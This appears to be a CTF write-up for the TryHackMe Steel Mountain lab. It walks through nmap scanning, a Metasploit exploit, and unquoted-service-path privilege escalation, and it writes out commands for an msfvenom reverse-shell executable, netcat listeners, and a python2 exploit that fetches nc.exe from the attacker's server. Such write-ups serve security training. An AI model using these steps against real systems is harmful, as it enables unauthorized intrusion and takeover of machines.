This post serves as a writeup for the TryHackMe.com Steel Mountain CTF.
Like any CTF machine, we will start with an NMAP scan to perform some basic enumeration. I have output the NMAP results to a .txt file for use later.
nmap -sV -O -p165535 -A -T4 --script=vuln -oN scan.txt <victim machine>
We can see that we have two HTTP web servers running. If we check the default port 80 webserver in our web browser, we are greeted with a picture of the employee of the month.
2. We can answer the second question with our nmap results.
3. By specifying the --script=vuln value we can start to identify some of the vulnerabilities that may exist. In this case we can find the answer to this question further down in our nmap results.
4. To find the CVE number for this exploit I searched for this application and version number on www.exploit-db.com.
5. At this point we can start Metasploit with the msfconsole command. Once Metasploit has started we will search for that CVE by typing search <CVE number>. We will then configure our exploit by setting the LHOST, RHOSTS, and RPORT values. Once our exploit is configured we simply execute the run command in Metasploit. Which will grant us a meterpreter session. After some time searching we are able to find the user.txt file which is the user flag.
6. Now that we have our initial shell we will perform further enumeration to escalate our privileges to root. Download the PowerUp.ps1 script from here. We can simply upload PowerUp using the command upload command in our meterpreter session. To execute PowerUp.ps1 use load powershell then powershell_shell. At this point we will start this script with . ./PowerUp.ps1 then Invoke-AllChecks.
7. Locate the service which shows up as an unquoted service path vulnerability.
Now we can generate a reverse shell as a Windows executable using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=<your machine> LPORT=1234 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
In order to overwrite the ASCService.exe we will need to stop the service. To do this we must first ctrl+c to exit PowerShell then type shell and sc stop AdvancedSystemCareService9.
Once the service is stopped we can return to our normal meterpreter session using ctrl+c and uploading ASCService.exe.
To connect to our elevated session we need to start a nc listener. nc -lnvp 1234.
Then returning to shell and starting the service, sc start AdvancedSystemCareService9.
8. In netcat you should now have access to the machine with elevated priveleges. Search the Adminstrator's Desktop for the root.txt.
Up until now we have utilized Metasploit to exploit this machine. We will now complete this room without the use of Metasploit.
This time we will use the same CVE but a different exploit. This python2 exploit will require the use of a simple python server, a netcat listener, and a netcat binary. You must change the file name of the netcat binary to "nc.exe" in order for this exploit to work. Additionally, the exploit must be executed twice.
Download the exploit and change the IP address to your local machine's IP and the port to 1234.
Download the netcat binary and change it's name to "nc.exe".
Start a netcat listener on your local machine: nc -lnvp 1234.
Start a simple python server in the directory with the netcat binary and exploit file: python3 -m http.server 8080.
Execute the exploit twice: python2 39161.py <target ip> 8080.
11. Now repeat the steps to stop the service, overwrite the ASCService.exe, and start the service again. You will now have root privileges using your netcat listener we setup earlier.
Thank you for reading this guide and feel free to explore my other writeups.